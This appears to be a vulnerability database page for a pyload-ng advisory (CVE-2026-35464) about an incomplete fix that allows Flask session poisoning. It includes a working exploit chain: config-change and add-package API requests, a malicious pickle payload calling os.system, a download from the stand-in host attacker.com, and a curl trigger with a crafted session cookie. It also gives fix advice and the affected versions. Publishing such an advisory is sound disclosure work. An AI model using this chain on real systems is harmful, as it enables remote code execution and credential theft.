PYSEC-2026-2989
Vulnerability from pysec - Published: 2026-07-13 14:36 - Updated: 2026-07-13 16:05Summary
The fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an ADMIN_ONLY_OPTIONS set to block non-admin users from modifying security-critical config options. The storage_folder option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.
Required Privileges
The chain requires a single non-admin user with both SETTINGS (to change storage_folder) and ADD (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.
Root Cause
storage_folder at src/pyload/core/api/__init__.py:238-246 has a path check that blocks writing inside PKGDIR or userdir using os.path.realpath. However, Flask's filesystem session directory (/tmp/pyLoad/flask/ in the standard Docker deployment) is outside both restricted paths.
pyload configures Flask with SESSION_TYPE = "filesystem" at __init__.py:127. The cachelib FileSystemCache stores session files as md5("session:" + session_id) and deserializes them with pickle.load() on every request that carries the corresponding session cookie.
Proven RCE Chain
Tested against lscr.io/linuxserver/pyload-ng:latest Docker image.
Step 1 — Change download directory to Flask session store:
POST /api/set_config_value
{"section":"core","category":"general","option":"storage_folder","value":"/tmp/pyLoad/flask"}
The path check resolves /tmp/pyLoad/flask/ via realpath. It does not start with PKGDIR (/lsiopy/.../pyload/) or userdir (/config/). Check passes.
Step 2 — Compute the target session filename:
md5("session:ATTACKER_SESSION_ID") = 92912f771df217fb6fbfded6705dd47c
Flask-Session uses cachelib which stores files as md5(key_prefix + session_id). The default key prefix is session:.
Step 3 — Host and download the malicious pickle payload:
import pickle, os, struct
class RCE:
def __reduce__(self):
return (os.system, ("id > /tmp/pyload-rce-success",))
session = {"_permanent": True, "rce": RCE()}
payload = struct.pack("I", 0) + pickle.dumps(session, protocol=2)
# struct.pack("I", 0) = cachelib timeout header (0 = never expires)
Serve as http://attacker.com/92912f771df217fb6fbfded6705dd47c and submit:
POST /api/add_package
{"name":"x","links":["http://attacker.com/92912f771df217fb6fbfded6705dd47c"],"dest":1}
The file is saved to /tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c.
Step 4 — Trigger deserialization (unauthenticated):
curl http://target:8000/ -b "pyload_session_8000=ATTACKER_SESSION_ID"
The session cookie name is pyload_session_ + the configured port number (__init__.py:128).
Flask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls pickle.load(). The RCE gadget executes.
Result:
$ docker exec pyload-poc cat /tmp/pyload-rce-success
uid=1000(abc) gid=1000(users) groups=1000(users)
Impact
A non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can:
- Execute arbitrary commands with the privileges of the pyload process
- Read environment variables (API keys, credentials)
- Access the filesystem (download history, user database)
- Pivot to other network resources
Suggested Fix
Add storage_folder to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):
ADMIN_ONLY_OPTIONS = {
...
("general", "storage_folder"), # ADDED: prevents session poisoning RCE
...
}
Also correct the existing wrong option names:
("webui", "ssl_certfile"), # FIXED: was "ssl_cert" (dead code)
("webui", "ssl_keyfile"), # FIXED: was "ssl_key" (dead code)
| Name | purl | pyload-ng | pkg:pypi/pyload-ng |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng",
"purl": "pkg:pypi/pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.5.0b3"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.5.0a5.dev528",
"0.5.0a5.dev532",
"0.5.0a5.dev535",
"0.5.0a5.dev536",
"0.5.0a5.dev537",
"0.5.0a5.dev539",
"0.5.0a5.dev540",
"0.5.0a5.dev545",
"0.5.0a5.dev562",
"0.5.0a5.dev564",
"0.5.0a5.dev565",
"0.5.0a6.dev570",
"0.5.0a6.dev578",
"0.5.0a6.dev587",
"0.5.0a7.dev596",
"0.5.0a8.dev602",
"0.5.0a9.dev615",
"0.5.0a9.dev629",
"0.5.0a9.dev632",
"0.5.0a9.dev641",
"0.5.0a9.dev643",
"0.5.0a9.dev655",
"0.5.0a9.dev806",
"0.5.0b1.dev1",
"0.5.0b1.dev2",
"0.5.0b1.dev3",
"0.5.0b1.dev4",
"0.5.0b1.dev5",
"0.5.0b2.dev10",
"0.5.0b2.dev11",
"0.5.0b2.dev12",
"0.5.0b2.dev9",
"0.5.0b3.dev100",
"0.5.0b3.dev101",
"0.5.0b3.dev13",
"0.5.0b3.dev14",
"0.5.0b3.dev17",
"0.5.0b3.dev18",
"0.5.0b3.dev19",
"0.5.0b3.dev20",
"0.5.0b3.dev21",
"0.5.0b3.dev22",
"0.5.0b3.dev24",
"0.5.0b3.dev26",
"0.5.0b3.dev27",
"0.5.0b3.dev28",
"0.5.0b3.dev29",
"0.5.0b3.dev30",
"0.5.0b3.dev31",
"0.5.0b3.dev32",
"0.5.0b3.dev33",
"0.5.0b3.dev34",
"0.5.0b3.dev35",
"0.5.0b3.dev38",
"0.5.0b3.dev39",
"0.5.0b3.dev40",
"0.5.0b3.dev41",
"0.5.0b3.dev42",
"0.5.0b3.dev43",
"0.5.0b3.dev44",
"0.5.0b3.dev45",
"0.5.0b3.dev46",
"0.5.0b3.dev47",
"0.5.0b3.dev48",
"0.5.0b3.dev49",
"0.5.0b3.dev50",
"0.5.0b3.dev51",
"0.5.0b3.dev52",
"0.5.0b3.dev53",
"0.5.0b3.dev54",
"0.5.0b3.dev57",
"0.5.0b3.dev60",
"0.5.0b3.dev62",
"0.5.0b3.dev64",
"0.5.0b3.dev65",
"0.5.0b3.dev66",
"0.5.0b3.dev67",
"0.5.0b3.dev68",
"0.5.0b3.dev69",
"0.5.0b3.dev70",
"0.5.0b3.dev71",
"0.5.0b3.dev72",
"0.5.0b3.dev73",
"0.5.0b3.dev74",
"0.5.0b3.dev75",
"0.5.0b3.dev76",
"0.5.0b3.dev77",
"0.5.0b3.dev78",
"0.5.0b3.dev79",
"0.5.0b3.dev80",
"0.5.0b3.dev81",
"0.5.0b3.dev82",
"0.5.0b3.dev85",
"0.5.0b3.dev87",
"0.5.0b3.dev88",
"0.5.0b3.dev89",
"0.5.0b3.dev90",
"0.5.0b3.dev91",
"0.5.0b3.dev92",
"0.5.0b3.dev93",
"0.5.0b3.dev94",
"0.5.0b3.dev95",
"0.5.0b3.dev96",
"0.5.0b3.dev97",
"0.5.0b3.dev98",
"0.5.0b3.dev99"
]
}
],
"aliases": [
"CVE-2026-35464",
"GHSA-4744-96p5-mp2j"
],
"details": "## Summary\n\nThe fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an `ADMIN_ONLY_OPTIONS` set to block non-admin users from modifying security-critical config options. The `storage_folder` option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.\n\n## Required Privileges\n\nThe chain requires a single non-admin user with both `SETTINGS` (to change `storage_folder`) and `ADD` (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.\n\n## Root Cause\n\n`storage_folder` at `src/pyload/core/api/__init__.py:238-246` has a path check that blocks writing inside PKGDIR or userdir using `os.path.realpath`. However, Flask\u0027s filesystem session directory (`/tmp/pyLoad/flask/` in the standard Docker deployment) is outside both restricted paths.\n\npyload configures Flask with `SESSION_TYPE = \"filesystem\"` at `__init__.py:127`. The cachelib `FileSystemCache` stores session files as `md5(\"session:\" + session_id)` and deserializes them with `pickle.load()` on every request that carries the corresponding session cookie.\n\n## Proven RCE Chain\n\nTested against `lscr.io/linuxserver/pyload-ng:latest` Docker image.\n\n**Step 1** \u2014 Change download directory to Flask session store:\n\n POST /api/set_config_value\n {\"section\":\"core\",\"category\":\"general\",\"option\":\"storage_folder\",\"value\":\"/tmp/pyLoad/flask\"}\n\nThe path check resolves `/tmp/pyLoad/flask/` via `realpath`. It does not start with PKGDIR (`/lsiopy/.../pyload/`) or userdir (`/config/`). Check passes.\n\n**Step 2** \u2014 Compute the target session filename:\n\n md5(\"session:ATTACKER_SESSION_ID\") = 92912f771df217fb6fbfded6705dd47c\n\nFlask-Session uses cachelib which stores files as `md5(key_prefix + session_id)`. The default key prefix is `session:`.\n\n**Step 3** \u2014 Host and download the malicious pickle payload:\n\n import pickle, os, struct\n class RCE:\n def __reduce__(self):\n return (os.system, (\"id \u003e /tmp/pyload-rce-success\",))\n session = {\"_permanent\": True, \"rce\": RCE()}\n payload = struct.pack(\"I\", 0) + pickle.dumps(session, protocol=2)\n # struct.pack(\"I\", 0) = cachelib timeout header (0 = never expires)\n\nServe as `http://attacker.com/92912f771df217fb6fbfded6705dd47c` and submit:\n\n POST /api/add_package\n {\"name\":\"x\",\"links\":[\"http://attacker.com/92912f771df217fb6fbfded6705dd47c\"],\"dest\":1}\n\nThe file is saved to `/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c`.\n\n**Step 4** \u2014 Trigger deserialization (unauthenticated):\n\n curl http://target:8000/ -b \"pyload_session_8000=ATTACKER_SESSION_ID\"\n\nThe session cookie name is `pyload_session_` + the configured port number (`__init__.py:128`).\n\nFlask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls `pickle.load()`. The RCE gadget executes.\n\n**Result**:\n\n $ docker exec pyload-poc cat /tmp/pyload-rce-success\n uid=1000(abc) gid=1000(users) groups=1000(users)\n\n## Impact\n\nA non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can:\n\n- Execute arbitrary commands with the privileges of the pyload process\n- Read environment variables (API keys, credentials)\n- Access the filesystem (download history, user database)\n- Pivot to other network resources\n\n## Suggested Fix\n\nAdd `storage_folder` to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):\n\n ADMIN_ONLY_OPTIONS = {\n ...\n (\"general\", \"storage_folder\"), # ADDED: prevents session poisoning RCE\n ...\n }\n\nAlso correct the existing wrong option names:\n\n (\"webui\", \"ssl_certfile\"), # FIXED: was \"ssl_cert\" (dead code)\n (\"webui\", \"ssl_keyfile\"), # FIXED: was \"ssl_key\" (dead code)",
"id": "PYSEC-2026-2989",
"modified": "2026-07-13T16:05:52.614509Z",
"published": "2026-07-13T14:36:48.066256Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35464"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33509"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/pyload-ng"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-4744-96p5-mp2j"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.